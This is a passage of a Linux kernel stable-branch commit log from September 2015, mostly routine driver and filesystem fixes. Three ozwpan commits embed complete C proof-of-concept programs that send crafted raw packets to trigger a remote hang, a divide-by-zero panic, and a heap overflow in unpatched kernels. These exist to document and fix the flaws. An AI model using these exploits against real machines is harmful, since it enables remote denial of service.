1. 18 Sep, 2015 40 commits
    • Sasha Levin's avatar
      vfs: read file_handle only once in handle_to_path · 39af20b5
      Sasha Levin authored
      commit 161f873b upstream.
      
      We used to read file_handle twice.  Once to get the amount of extra
      bytes, and once to fetch the entire structure.
      
      This may be problematic since we do size verifications only after the
      first read, so if the number of extra bytes changes in userspace between
      the first and second calls, we'll have an incoherent view of
      file_handle.
      
      Instead, read the constant size once, and copy that over to the final
      structure without having to re-read it again.
      Signed-off-by: default avatarSasha Levin <sasha.levin@oracle.com>
      Cc: Al Viro <viro@zeniv.linux.org.uk>
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      39af20b5
    • Ville Syrjälä's avatar
      drm/i915: Don't skip request retirement if the active list is empty · 67e446d9
      Ville Syrjälä authored
      commit 0aedb162 upstream.
      
      Apparently we can have requests even if though the active list is empty,
      so do the request retirement regardless of whether there's anything
      on the active list.
      
      The way it happened here is that during suspend intel_ring_idle()
      notices the olr hanging around and then proceeds to get rid of it by
      adding a request. However since there was nothing on the active lists
      i915_gem_retire_requests() didn't clean those up, and so the idle work
      never runs, and we leave the GPU "busy" during suspend resulting in a
      WARN later.
      Signed-off-by: default avatarVille Syrjälä <ville.syrjala@linux.intel.com>
      Reviewed-by: default avatarChris Wilson <chris@chris-wilson.co.uk>
      Signed-off-by: default avatarJani Nikula <jani.nikula@intel.com>
      [lizf: Backported to 3.4: adjust context]
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      67e446d9
    • Jason A. Donenfeld's avatar
      ozwpan: unchecked signed subtraction leads to DoS · 7c035c1b
      Jason A. Donenfeld authored
      commit 9a59029b upstream.
      
      The subtraction here was using a signed integer and did not have any
      bounds checking at all. This commit adds proper bounds checking, made
      easy by use of an unsigned integer. This way, a single packet won't be
      able to remotely trigger a massive loop, locking up the system for a
      considerable amount of time. A PoC follows below, which requires
      ozprotocol.h from this module.
      
      =-=-=-=-=-=
      
       #include <arpa/inet.h>
       #include <linux/if_packet.h>
       #include <net/if.h>
       #include <netinet/ether.h>
       #include <stdio.h>
       #include <string.h>
       #include <stdlib.h>
       #include <endian.h>
       #include <sys/ioctl.h>
       #include <sys/socket.h>
      
       #define u8 uint8_t
       #define u16 uint16_t
       #define u32 uint32_t
       #define __packed __attribute__((__packed__))
       #include "ozprotocol.h"
      
      static int hex2num(char c)
      {
      	if (c >= '0' && c <= '9')
      		return c - '0';
      	if (c >= 'a' && c <= 'f')
      		return c - 'a' + 10;
      	if (c >= 'A' && c <= 'F')
      		return c - 'A' + 10;
      	return -1;
      }
      static int hwaddr_aton(const char *txt, uint8_t *addr)
      {
      	int i;
      	for (i = 0; i < 6; i++) {
      		int a, b;
      		a = hex2num(*txt++);
      		if (a < 0)
      			return -1;
      		b = hex2num(*txt++);
      		if (b < 0)
      			return -1;
      		*addr++ = (a << 4) | b;
      		if (i < 5 && *txt++ != ':')
      			return -1;
      	}
      	return 0;
      }
      
      int main(int argc, char *argv[])
      {
      	if (argc < 3) {
      		fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
      		return 1;
      	}
      
      	uint8_t dest_mac[6];
      	if (hwaddr_aton(argv[2], dest_mac)) {
      		fprintf(stderr, "Invalid mac address.\n");
      		return 1;
      	}
      
      	int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
      	if (sockfd < 0) {
      		perror("socket");
      		return 1;
      	}
      
      	struct ifreq if_idx;
      	int interface_index;
      	strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
      	if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
      		perror("SIOCGIFINDEX");
      		return 1;
      	}
      	interface_index = if_idx.ifr_ifindex;
      	if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
      		perror("SIOCGIFHWADDR");
      		return 1;
      	}
      	uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_elt_connect_req oz_elt_connect_req;
      		struct oz_elt oz_elt2;
      		struct oz_multiple_fixed oz_multiple_fixed;
      	} __packed packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(0)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_CONNECT_REQ,
      			.length = sizeof(struct oz_elt_connect_req)
      		},
      		.oz_elt_connect_req = {
      			.mode = 0,
      			.resv1 = {0},
      			.pd_info = 0,
      			.session_id = 0,
      			.presleep = 0,
      			.ms_isoc_latency = 0,
      			.host_vendor = 0,
      			.keep_alive = 0,
      			.apps = htole16((1 << OZ_APPID_USB) | 0x1),
      			.max_len_div16 = 0,
      			.ms_per_isoc = 0,
      			.up_audio_buf = 0,
      			.ms_per_elt = 0
      		},
      		.oz_elt2 = {
      			.type = OZ_ELT_APP_DATA,
      			.length = sizeof(struct oz_multiple_fixed) - 3
      		},
      		.oz_multiple_fixed = {
      			.app_id = OZ_APPID_USB,
      			.elt_seq_num = 0,
      			.type = OZ_USB_ENDPOINT_DATA,
      			.endpoint = 0,
      			.format = OZ_DATA_F_MULTIPLE_FIXED,
      			.unit_size = 1,
      			.data = {0}
      		}
      	};
      
      	struct sockaddr_ll socket_address = {
      		.sll_ifindex = interface_index,
      		.sll_halen = ETH_ALEN,
      		.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      	};
      
      	if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	return 0;
      }
      Signed-off-by: default avatarJason A. Donenfeld <Jason@zx2c4.com>
      Acked-by: default avatarDan Carpenter <dan.carpenter@oracle.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      7c035c1b
    • Jason A. Donenfeld's avatar
      ozwpan: divide-by-zero leading to panic · 556dc6bf
      Jason A. Donenfeld authored
      commit 04bf464a upstream.
      
      A network supplied parameter was not checked before division, leading to
      a divide-by-zero. Since this happens in the softirq path, it leads to a
      crash. A PoC follows below, which requires the ozprotocol.h file from
      this module.
      
      =-=-=-=-=-=
      
       #include <arpa/inet.h>
       #include <linux/if_packet.h>
       #include <net/if.h>
       #include <netinet/ether.h>
       #include <stdio.h>
       #include <string.h>
       #include <stdlib.h>
       #include <endian.h>
       #include <sys/ioctl.h>
       #include <sys/socket.h>
      
       #define u8 uint8_t
       #define u16 uint16_t
       #define u32 uint32_t
       #define __packed __attribute__((__packed__))
       #include "ozprotocol.h"
      
      static int hex2num(char c)
      {
      	if (c >= '0' && c <= '9')
      		return c - '0';
      	if (c >= 'a' && c <= 'f')
      		return c - 'a' + 10;
      	if (c >= 'A' && c <= 'F')
      		return c - 'A' + 10;
      	return -1;
      }
      static int hwaddr_aton(const char *txt, uint8_t *addr)
      {
      	int i;
      	for (i = 0; i < 6; i++) {
      		int a, b;
      		a = hex2num(*txt++);
      		if (a < 0)
      			return -1;
      		b = hex2num(*txt++);
      		if (b < 0)
      			return -1;
      		*addr++ = (a << 4) | b;
      		if (i < 5 && *txt++ != ':')
      			return -1;
      	}
      	return 0;
      }
      
      int main(int argc, char *argv[])
      {
      	if (argc < 3) {
      		fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
      		return 1;
      	}
      
      	uint8_t dest_mac[6];
      	if (hwaddr_aton(argv[2], dest_mac)) {
      		fprintf(stderr, "Invalid mac address.\n");
      		return 1;
      	}
      
      	int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
      	if (sockfd < 0) {
      		perror("socket");
      		return 1;
      	}
      
      	struct ifreq if_idx;
      	int interface_index;
      	strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
      	if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
      		perror("SIOCGIFINDEX");
      		return 1;
      	}
      	interface_index = if_idx.ifr_ifindex;
      	if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
      		perror("SIOCGIFHWADDR");
      		return 1;
      	}
      	uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_elt_connect_req oz_elt_connect_req;
      		struct oz_elt oz_elt2;
      		struct oz_multiple_fixed oz_multiple_fixed;
      	} __packed packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(0)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_CONNECT_REQ,
      			.length = sizeof(struct oz_elt_connect_req)
      		},
      		.oz_elt_connect_req = {
      			.mode = 0,
      			.resv1 = {0},
      			.pd_info = 0,
      			.session_id = 0,
      			.presleep = 0,
      			.ms_isoc_latency = 0,
      			.host_vendor = 0,
      			.keep_alive = 0,
      			.apps = htole16((1 << OZ_APPID_USB) | 0x1),
      			.max_len_div16 = 0,
      			.ms_per_isoc = 0,
      			.up_audio_buf = 0,
      			.ms_per_elt = 0
      		},
      		.oz_elt2 = {
      			.type = OZ_ELT_APP_DATA,
      			.length = sizeof(struct oz_multiple_fixed)
      		},
      		.oz_multiple_fixed = {
      			.app_id = OZ_APPID_USB,
      			.elt_seq_num = 0,
      			.type = OZ_USB_ENDPOINT_DATA,
      			.endpoint = 0,
      			.format = OZ_DATA_F_MULTIPLE_FIXED,
      			.unit_size = 0,
      			.data = {0}
      		}
      	};
      
      	struct sockaddr_ll socket_address = {
      		.sll_ifindex = interface_index,
      		.sll_halen = ETH_ALEN,
      		.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      	};
      
      	if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	return 0;
      }
      Signed-off-by: default avatarJason A. Donenfeld <Jason@zx2c4.com>
      Acked-by: default avatarDan Carpenter <dan.carpenter@oracle.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      556dc6bf
    • Jason A. Donenfeld's avatar
      ozwpan: Use proper check to prevent heap overflow · 088a5881
      Jason A. Donenfeld authored
      commit d114b9fe upstream.
      
      Since elt->length is a u8, we can make this variable a u8. Then we can
      do proper bounds checking more easily. Without this, a potentially
      negative value is passed to the memcpy inside oz_hcd_get_desc_cnf,
      resulting in a remotely exploitable heap overflow with network
      supplied data.
      
      This could result in remote code execution. A PoC which obtains DoS
      follows below. It requires the ozprotocol.h file from this module.
      
      =-=-=-=-=-=
      
       #include <arpa/inet.h>
       #include <linux/if_packet.h>
       #include <net/if.h>
       #include <netinet/ether.h>
       #include <stdio.h>
       #include <string.h>
       #include <stdlib.h>
       #include <endian.h>
       #include <sys/ioctl.h>
       #include <sys/socket.h>
      
       #define u8 uint8_t
       #define u16 uint16_t
       #define u32 uint32_t
       #define __packed __attribute__((__packed__))
       #include "ozprotocol.h"
      
      static int hex2num(char c)
      {
      	if (c >= '0' && c <= '9')
      		return c - '0';
      	if (c >= 'a' && c <= 'f')
      		return c - 'a' + 10;
      	if (c >= 'A' && c <= 'F')
      		return c - 'A' + 10;
      	return -1;
      }
      static int hwaddr_aton(const char *txt, uint8_t *addr)
      {
      	int i;
      	for (i = 0; i < 6; i++) {
      		int a, b;
      		a = hex2num(*txt++);
      		if (a < 0)
      			return -1;
      		b = hex2num(*txt++);
      		if (b < 0)
      			return -1;
      		*addr++ = (a << 4) | b;
      		if (i < 5 && *txt++ != ':')
      			return -1;
      	}
      	return 0;
      }
      
      int main(int argc, char *argv[])
      {
      	if (argc < 3) {
      		fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
      		return 1;
      	}
      
      	uint8_t dest_mac[6];
      	if (hwaddr_aton(argv[2], dest_mac)) {
      		fprintf(stderr, "Invalid mac address.\n");
      		return 1;
      	}
      
      	int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
      	if (sockfd < 0) {
      		perror("socket");
      		return 1;
      	}
      
      	struct ifreq if_idx;
      	int interface_index;
      	strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
      	if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
      		perror("SIOCGIFINDEX");
      		return 1;
      	}
      	interface_index = if_idx.ifr_ifindex;
      	if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
      		perror("SIOCGIFHWADDR");
      		return 1;
      	}
      	uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_elt_connect_req oz_elt_connect_req;
      	} __packed connect_packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(0)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_CONNECT_REQ,
      			.length = sizeof(struct oz_elt_connect_req)
      		},
      		.oz_elt_connect_req = {
      			.mode = 0,
      			.resv1 = {0},
      			.pd_info = 0,
      			.session_id = 0,
      			.presleep = 35,
      			.ms_isoc_latency = 0,
      			.host_vendor = 0,
      			.keep_alive = 0,
      			.apps = htole16((1 << OZ_APPID_USB) | 0x1),
      			.max_len_div16 = 0,
      			.ms_per_isoc = 0,
      			.up_audio_buf = 0,
      			.ms_per_elt = 0
      		}
      	};
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_get_desc_rsp oz_get_desc_rsp;
      	} __packed pwn_packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(1)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_APP_DATA,
      			.length = sizeof(struct oz_get_desc_rsp) - 2
      		},
      		.oz_get_desc_rsp = {
      			.app_id = OZ_APPID_USB,
      			.elt_seq_num = 0,
      			.type = OZ_GET_DESC_RSP,
      			.req_id = 0,
      			.offset = htole16(0),
      			.total_size = htole16(0),
      			.rcode = 0,
      			.data = {0}
      		}
      	};
      
      	struct sockaddr_ll socket_address = {
      		.sll_ifindex = interface_index,
      		.sll_halen = ETH_ALEN,
      		.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      	};
      
      	if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	usleep(300000);
      	if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	return 0;
      }
      Signed-off-by: default avatarJason A. Donenfeld <Jason@zx2c4.com>
      Acked-by: default avatarDan Carpenter <dan.carpenter@oracle.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      088a5881
    • Patrick Riphagen's avatar
      USB: serial: ftdi_sio: Add support for a Motion Tracker Development Board · 48e8020f
      Patrick Riphagen authored
      commit 1df5b888 upstream.
      
      This adds support for new Xsens device, Motion Tracker Development Board,
      using Xsens' own Vendor ID
      Signed-off-by: default avatarPatrick Riphagen <patrick.riphagen@xsens.com>
      Signed-off-by: default avatarJohan Hovold <johan@kernel.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      48e8020f
    • Andy Grover's avatar
      target/pscsi: Don't leak scsi_host if hba is VIRTUAL_HOST · 419985ec
      Andy Grover authored
      commit 5a7125c6 upstream.
      
      See https://bugzilla.redhat.com/show_bug.cgi?id=1025672
      
      We need to put() the reference to the scsi host that we got in
      pscsi_configure_device(). In VIRTUAL_HOST mode it is associated with
      the dev_virt, not the hba_virt.
      Signed-off-by: default avatarAndy Grover <agrover@redhat.com>
      Signed-off-by: default avatarNicholas Bellinger <nab@linux-iscsi.org>
      [lizf: Backported to 3.4: adjust context]
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      419985ec
    • Al Viro's avatar
      d_walk() might skip too much · 19cc68ff
      Al Viro authored
      commit 2159184e upstream.
      
      when we find that a child has died while we'd been trying to ascend,
      we should go into the first live sibling itself, rather than its sibling.
      
      Off-by-one in question had been introduced in "deal with deadlock in
      d_walk()" and the fix needs to be backported to all branches this one
      has been backported to.
      Signed-off-by: default avatarAl Viro <viro@zeniv.linux.org.uk>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      19cc68ff
    • Sasha Levin's avatar
      fs, omfs: add NULL terminator in the end up the token list · b31dfb22
      Sasha Levin authored
      commit dcbff39d upstream.
      
      match_token() expects a NULL terminator at the end of the token list so
      that it would know where to stop.  Not having one causes it to overrun
      to invalid memory.
      
      In practice, passing a mount option that omfs didn't recognize would
      sometimes panic the system.
      Signed-off-by: default avatarSasha Levin <sasha.levin@oracle.com>
      Signed-off-by: default avatarBob Copeland <me@bobcopeland.com>
      Signed-off-by: default avatarAndrew Morton <akpm@linux-foundation.org>
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      b31dfb22
    • Rusty Russell's avatar
      lguest: fix out-by-one error in address checking. · 99672cc3
      Rusty Russell authored
      commit 83a35114 upstream.
      
      This bug has been there since day 1; addresses in the top guest physical
      page weren't considered valid.  You could map that page (the check in
      check_gpte() is correct), but if a guest tried to put a pagetable there
      we'd check that address manually when walking it, and kill the guest.
      Signed-off-by: default avatarRusty Russell <rusty@rustcorp.com.au>
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      99672cc3
    • Alexei Starovoitov's avatar
      x86: bpf_jit: fix compilation of large bpf programs · 67ba9818
      Alexei Starovoitov authored
      commit 3f7352bf upstream.
      
      x86 has variable length encoding. x86 JIT compiler is trying
      to pick the shortest encoding for given bpf instruction.
      While doing so the jump targets are changing, so JIT is doing
      multiple passes over the program. Typical program needs 3 passes.
      Some very short programs converge with 2 passes. Large programs
      may need 4 or 5. But specially crafted bpf programs may hit the
      pass limit and if the program converges on the last iteration
      the JIT compiler will be producing an image full of 'int 3' insns.
      Fix this corner case by doing final iteration over bpf program.
      
      Fixes: 0a14842f ("net: filter: Just In Time compiler for x86-64")
      Reported-by: default avatarDaniel Borkmann <daniel@iogearbox.net>
      Signed-off-by: default avatarAlexei Starovoitov <ast@plumgrid.com>
      Tested-by: default avatarDaniel Borkmann <daniel@iogearbox.net>
      Acked-by: default avatarDaniel Borkmann <daniel@iogearbox.net>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      [lizf: Backported to 3.4: adjust context]
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      67ba9818
    • Borislav Petkov's avatar
      x86/mce: Fix MCE severity messages · b12c3f9c
      Borislav Petkov authored
      commit 17fea54b upstream.
      
      Derek noticed that a critical MCE gets reported with the wrong
      error type description:
      
        [Hardware Error]: CPU 34: Machine Check Exception: 5 Bank 9: f200003f000100b0
        [Hardware Error]: RIP !INEXACT! 10:<ffffffff812e14c1> {intel_idle+0xb1/0x170}
        [Hardware Error]: TSC 49587b8e321cb
        [Hardware Error]: PROCESSOR 0:306e4 TIME 1431561296 SOCKET 1 APIC 29
        [Hardware Error]: Some CPUs didn't answer in synchronization
        [Hardware Error]: Machine check: Invalid
      				   ^^^^^^^
      
      The last line with 'Invalid' should have printed the high level
      MCE error type description we get from mce_severity, i.e.
      something like:
      
        [Hardware Error]: Machine check: Action required: data load error in a user process
      
      this happens due to the fact that mce_no_way_out() iterates over
      all MCA banks and possibly overwrites the @msg argument which is
      used in the panic printing later.
      
      Change behavior to take the message of only and the (last)
      critical MCE it detects.
      Reported-by: default avatarDerek <denc716@gmail.com>
      Signed-off-by: default avatarBorislav Petkov <bp@suse.de>
      Cc: H. Peter Anvin <hpa@zytor.com>
      Cc: Linus Torvalds <torvalds@linux-foundation.org>
      Cc: Peter Zijlstra <peterz@infradead.org>
      Cc: Thomas Gleixner <tglx@linutronix.de>
      Cc: Tony Luck <tony.luck@intel.com>
      Link: http://lkml.kernel.org/r/1431936437-25286-3-git-send-email-bp@alien8.deSigned-off-by: default avatarIngo Molnar <mingo@kernel.org>
      [lizf: Backported to 3.4: adjust context]
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      b12c3f9c
    • Philippe Reynes's avatar
      ARM: dts: imx27: only map 4 Kbyte for fec registers · b816cc96
      Philippe Reynes authored
      commit a29ef819 upstream.
      
      According to the imx27 documentation, fec has a 4 Kbyte
      memory space map. Moreover, the actual 16 Kbyte mapping
      overlaps the SCC (Security Controller) memory register
      space. So, we reduce the memory register space to 4 Kbyte.
      Signed-off-by: default avatarPhilippe Reynes <tremyfr@gmail.com>
      Acked-by: default avatarUwe Kleine-König <u.kleine-koenig@pengutronix.de>
      Fixes: 9f0749e3 ("ARM i.MX27: Add devicetree support")
      Signed-off-by: default avatarShawn Guo <shawn.guo@linaro.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      b816cc96
    • Thadeu Lima de Souza Cascardo's avatar
      bridge: fix parsing of MLDv2 reports · 6121d7fd
      Thadeu Lima de Souza Cascardo authored
      commit 47cc84ce upstream.
      
      When more than a multicast address is present in a MLDv2 report, all but
      the first address is ignored, because the code breaks out of the loop if
      there has not been an error adding that address.
      
      This has caused failures when two guests connected through the bridge
      tried to communicate using IPv6. Neighbor discoveries would not be
      transmitted to the other guest when both used a link-local address and a
      static address.
      
      This only happens when there is a MLDv2 querier in the network.
      
      The fix will only break out of the loop when there is a failure adding a
      multicast address.
      
      The mdb before the patch:
      
      dev ovirtmgmt port vnet0 grp ff02::1:ff7d:6603 temp
      dev ovirtmgmt port vnet1 grp ff02::1:ff7d:6604 temp
      dev ovirtmgmt port bond0.86 grp ff02::2 temp
      
      After the patch:
      
      dev ovirtmgmt port vnet0 grp ff02::1:ff7d:6603 temp
      dev ovirtmgmt port vnet1 grp ff02::1:ff7d:6604 temp
      dev ovirtmgmt port bond0.86 grp ff02::fb temp
      dev ovirtmgmt port bond0.86 grp ff02::2 temp
      dev ovirtmgmt port bond0.86 grp ff02::d temp
      dev ovirtmgmt port vnet0 grp ff02::1:ff00:76 temp
      dev ovirtmgmt port bond0.86 grp ff02::16 temp
      dev ovirtmgmt port vnet1 grp ff02::1:ff00:77 temp
      dev ovirtmgmt port bond0.86 grp ff02::1:ff00:def temp
      dev ovirtmgmt port bond0.86 grp ff02::1:ffa1:40bf temp
      
      Fixes: 08b202b6 ("bridge br_multicast: IPv6 MLD support.")
      Reported-by: default avatarRik Theys <Rik.Theys@esat.kuleuven.be>
      Signed-off-by: default avatarThadeu Lima de Souza Cascardo <cascardo@redhat.com>
      Tested-by: default avatarRik Theys <Rik.Theys@esat.kuleuven.be>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      6121d7fd
    • Harald Freudenberger's avatar
      crypto: s390/ghash - Fix incorrect ghash icv buffer handling. · 08878d1c
      Harald Freudenberger authored
      commit a1cae34e upstream.
      
      Multitheaded tests showed that the icv buffer in the current ghash
      implementation is not handled correctly. A move of this working ghash
      buffer value to the descriptor context fixed this. Code is tested and
      verified with an multithreaded application via af_alg interface.
      Signed-off-by: default avatarHarald Freudenberger <freude@linux.vnet.ibm.com>
      Signed-off-by: default avatarGerald Schaefer <geraldsc@linux.vnet.ibm.com>
      Reported-by: default avatarHerbert Xu <herbert@gondor.apana.org.au>
      Signed-off-by: default avatarHerbert Xu <herbert@gondor.apana.org.au>
      [lizf: Backported to 3.4:
       - adjust context
       - drop the change to memcpy()]
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      08878d1c
    • David Vrabel's avatar
      xen/events: don't bind non-percpu VIRQs with percpu chip · 0b80fa4b
      David Vrabel authored
      commit 77bb3dfd upstream.
      
      A non-percpu VIRQ (e.g., VIRQ_CONSOLE) may be freed on a different
      VCPU than it is bound to.  This can result in a race between
      handle_percpu_irq() and removing the action in __free_irq() because
      handle_percpu_irq() does not take desc->lock.  The interrupt handler
      sees a NULL action and oopses.
      
      Only use the percpu chip/handler for per-CPU VIRQs (like VIRQ_TIMER).
      
        # cat /proc/interrupts | grep virq
         40:      87246          0  xen-percpu-virq      timer0
         44:          0          0  xen-percpu-virq      debug0
         47:          0      20995  xen-percpu-virq      timer1
         51:          0          0  xen-percpu-virq      debug1
         69:          0          0   xen-dyn-virq      xen-pcpu
         74:          0          0   xen-dyn-virq      mce
         75:         29          0   xen-dyn-virq      hvc_console
      Signed-off-by: default avatarDavid Vrabel <david.vrabel@citrix.com>
      [lizf: Backported to 3.4: adjust filename]
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      0b80fa4b
    • Mark Hounschell's avatar
      sd: Disable support for 256 byte/sector disks · c1de4ad5
      Mark Hounschell authored
      commit 74856fbf upstream.
      
      256 bytes per sector support has been broken since 2.6.X,
      and no-one stepped up to fix this.
      So disable support for it.
      Signed-off-by: default avatarMark Hounschell <dmarkh@cfl.rr.com>
      Signed-off-by: default avatarHannes Reinecke <hare@suse.de>
      Signed-off-by: default avatarJames Bottomley <JBottomley@Odin.com>
      [lizf: Backported to 3.4: adjust context]
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      c1de4ad5
    • Ludovic Desroches's avatar
      mmc: atmel-mci: fix bad variable type for clkdiv · cc81c42b
      Ludovic Desroches authored
      commit 60c8f783 upstream.
      
      clkdiv is declared as an u32 but it can be set to a negative value
      causing a huge divisor value. Change its type to int to avoid this case.
      Signed-off-by: default avatarLudovic Desroches <ludovic.desroches@atmel.com>
      Signed-off-by: default avatarUlf Hansson <ulf.hansson@linaro.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      cc81c42b
    • David Henningsson's avatar
      ALSA: hda - Add Conexant codecs CX20721, CX20722, CX20723 and CX20724 · f126db0e
      David Henningsson authored
      commit 6ffc0898 upstream.
      
      This patch adds support for Conexant HD Audio codecs
      CX20721, CX20722, CX20723 and CX20724.
      
      BugLink: https://bugs.launchpad.net/bugs/1454656Signed-off-by: default avatarDavid Henningsson <david.henningsson@canonical.com>
      Signed-off-by: default avatarTakashi Iwai <tiwai@suse.de>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      f126db0e
    • Anton Blanchard's avatar
      powerpc: Align TOC to 256 bytes · 232efafc
      Anton Blanchard authored
      commit 5e95235c upstream.
      
      Recent toolchains force the TOC to be 256 byte aligned. We need
      to enforce this alignment in our linker script, otherwise pointers
      to our TOC variables (__toc_start, __prom_init_toc_start) could
      be incorrect.
      
      If they are bad, we die a few hundred instructions into boot.
      Signed-off-by: default avatarAnton Blanchard <anton@samba.org>
      Signed-off-by: default avatarMichael Ellerman <mpe@ellerman.id.au>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      232efafc
    • Benjamin Tissoires's avatar
      Input: elantech - fix semi-mt protocol for v3 HW · dacca44e
      Benjamin Tissoires authored
      commit 3c0213d1 upstream.
      
      When the v3 hardware sees more than one finger, it uses the semi-mt
      protocol to report the touches. However, it currently works when
      num_fingers is 0, 1 or 2, but when it is 3 and above, it sends only 1
      finger as if num_fingers was 1.
      
      This confuses userspace which knows how to deal with extra fingers
      when all the slots are used, but not when some are missing.
      
      Fixes: https://bugs.freedesktop.org/show_bug.cgi?id=90101Signed-off-by: default avatarBenjamin Tissoires <benjamin.tissoires@redhat.com>
